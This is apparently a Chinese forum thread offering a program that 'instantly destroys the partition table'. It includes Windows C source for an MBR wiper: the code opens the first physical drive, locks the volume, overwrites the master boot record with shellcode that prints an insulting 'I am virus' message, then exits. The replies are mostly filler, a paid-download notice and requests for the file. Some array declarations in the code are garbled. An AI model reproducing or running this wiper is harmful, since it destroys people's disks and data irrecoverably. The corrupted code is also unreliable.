这个怎么用
看看。。。。。。。。。。。。。。。。。。
楼主呜呜呜
大多数电动蝶阀
感谢分享感谢分享感谢分享感谢分享感谢分享感谢分享感谢分享
我顶顶顶顶顶顶
我顶顶顶顶顶顶
瞬间破坏硬盘分区表,让电脑蓝屏退出的程序
#include<stdio.h>
#include<tchar.h>
#include<Windows.h>
#include<ntddscsi.h>
//This shell code can be modfit
// I am virus! Fuck you
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int KillMBR();
int main()
{
KillMBR();
return 0;
}
int KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR = { 0 };
// rebuild MBR
memcpy(pMBR, scode, sizeof(scode)-1);
pMBR = 0x55;
pMBR = 0xAA;
//Open disk
hDevice = CreateFile
(
_T("\\\\.\\PHYSICALDRIVE0"),
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)//Open fail
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// Write-in virus
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
//Close hard drive
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
费50积分购买附件即可直接下载。
好帖,收藏了
5555555555555555555555555555
很牛的样子 看看
很好奇,想要看看/下来试试
我要查看隐藏内容~
感谢分享
这个下载了的童鞋最好别滥用哦,比较危险
我想看看,然后在虚拟机试试
学习一下哦
我资格不够,谁发给我一份程序,邮箱1217509930@qq.com,谢谢!